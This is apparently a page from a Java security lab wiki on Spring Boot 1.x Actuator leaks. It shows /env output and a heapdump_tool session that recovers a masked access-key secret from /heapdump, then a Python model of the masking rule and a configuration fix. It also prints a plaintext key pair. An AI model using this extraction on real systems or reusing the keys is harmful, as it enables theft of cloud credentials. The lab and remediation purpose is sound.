Actuator Information Leakage

JoyChou edited this page Apr 28, 2023 · 2 revisions

Environment

The Spring Boot version is 1.5.1. An AK/SK (access key id / secret) pair is configured in the application.properties file and is then exposed through Actuator's env endpoint; because the key name contains the string secret, Actuator masks its value by default. For Spring Boot 1.x the endpoint is /env.

Information from application.properties leaked via /env:

applicationConfig: [classpath:/application.properties]: {
joychou.security.csrf.method: "POST",
joychou.business.callback: "callback_",
joychou.security.referer.uri: "/jsonp/**",
spring.datasource.url: "jdbc:mysql://localhost:3306/java_sec_code?allowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC",
joychou.security.csrf.enabled: "false",
joychou.security.referer.enabled: "false",
spring.datasource.password: "******",
spring.datasource.driver-class-name: "com.mysql.cj.jdbc.Driver",
management.security.enabled: "false",
endpoints.enabled: "true",
joychou.security.jsonp.referer.check.enabled: "true",
swagger.enable: "true",
spring.datasource.username: "root",
mybatis.mapper-locations: "classpath:mapper/*.xml",
joychou.security.csrf.exclude.url: "/xxe/**, /fastjson/**, /xstream/**, /ssrf/**, /deserialize/**",
joychou.security.jsonp.callback: "callback, _callback",
jsc.accessKey.id: "LTAI5tSAEPX3Z5N2Yt8ogc2y",
joychou.security.referer.host: "joychou.org, joychou.com",
jsc.accessKey.secret: "******",
joychou.no.need.login.url: "/css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**",
logging.level.org.joychou.mapper: "debug"
}

The actual application.properties configuration:

jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7

Exploitation

Besides secret, Actuator also masks keys matching the following strings; the relevant code is in org/springframework/boot/actuate/endpoint/Sanitizer.java:

("password", "secret", "key", "token", ".*credentials.*", "vcap_services")
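As an added illustration (not code from java-sec-code or Spring Boot), the following Python re-implements the matching rule that Spring Boot 1.5's Sanitizer applies to those default keys: a plain entry becomes a case-insensitive suffix match (".*<entry>$"), an entry containing regex metacharacters is used as-is. Run over a constructed subset of the /env output above, it shows why jsc.accessKey.id is returned in clear while jsc.accessKey.secret and spring.datasource.password are masked; the regex-detection check and the sample values are assumptions made for this example.

```python
import re

# Default keysToSanitize of Spring Boot 1.5's Sanitizer, as listed on this page.
KEYS_TO_SANITIZE = ("password", "secret", "key", "token", ".*credentials.*", "vcap_services")


def _is_regex(value: str) -> bool:
    # Assumption: an entry counts as a regex when it contains a regex metacharacter.
    return any(c in value for c in "*$^+")


def _to_pattern(value: str):
    if _is_regex(value):
        return re.compile(value, re.IGNORECASE)
    # Plain entries become a suffix match on the property key: ".*<entry>$"
    return re.compile(".*" + re.escape(value) + "$", re.IGNORECASE)


PATTERNS = [_to_pattern(k) for k in KEYS_TO_SANITIZE]


def sanitize(key: str, value):
    """Return '******' when the property key matches a sanitize pattern, else the value."""
    if value is None:
        return None
    for pattern in PATTERNS:
        # Java's Matcher.matches() requires the whole key to match, hence fullmatch().
        if pattern.fullmatch(key):
            return "******"
    return value


def sanitize_properties(props: dict) -> dict:
    """Apply the Sanitizer rule to every property, as /env does before rendering."""
    return {k: sanitize(k, v) for k, v in props.items()}


def unmasked_keys(props: dict) -> list:
    """Keys whose values /env would show in clear; useful for reviewing naming choices."""
    return [k for k, v in sanitize_properties(props).items() if v != "******"]


# Constructed subset of the page's /env output with placeholder values.
SAMPLE = {
    "spring.datasource.username": "root",
    "spring.datasource.password": "example-db-pass",
    "jsc.accessKey.id": "EXAMPLE_ACCESS_KEY_ID",
    "jsc.accessKey.secret": "EXAMPLE_SECRET",
}

if __name__ == "__main__":
    for k, v in sanitize_properties(SAMPLE).items():
        print(f"{k}: {v}")
```

Because the match is on the key suffix only, a property named jsc.accessKey.id is never masked even though it contains "key"; the heap dump, of course, is not passed through this sanitizer at all.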

Through the /env endpoint we obtain the plaintext AK and the masked SK, so the question is how to obtain the plaintext SK. Download /heapdump to get the heap dump, then use the heapdump_tool tool to extract the plaintext value from it.

➜ java -jar heapdump_tool.jar heapdump2023-04-27-10-25-live4096109267684660351.hprof
[-] file: heapdump2023-04-27-10-25-live4096109267684660351.hprof
[-] Start jhat, waiting...
[-] fing object count: 107053
[-] too many object,please input 0/1 to choose mode.
0. (search data, may can't find some data, can't use function num=,len=,getip,geturl,getfile).
1. (load all object, need wait a few minutes).
> 0
[-] please input keyword value to search, example: password,re=xxx,len=16,num=0-10,id=0x123a,class=org.xx,all=true,geturl,getfile,getip,shirokey,systemproperties,allproperties,hashtable input q/quit to quit.
> jsc.accessKey.secret
[-] Start process keyword: jsc.accessKey.secret
>> jsc.accessKey.secret -> W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
[-] please input keyword value to search, example: password,re=xxx,len=16,num=0-10,id=0x123a,class=org.xx,all=true,geturl,getfile,getip,shirokey,systemproperties,allproperties,hashtable input q/quit to quit.

Fix

In Spring Boot 1.x the Actuator endpoints switch endpoints.enabled is on by default, but because of Actuator's own security restriction only a few endpoints such as /health can be accessed, and those carry no security risk. However, management.security.enabled controls that security restriction; if it is turned off, all endpoints are exposed. The fix can therefore be:

management.security.enabled=true, or remove the management.security.enabled setting entirely

endpoints.enabled can also be used to control whether Actuator's endpoints are enabled at all:

endpoints.enabled=false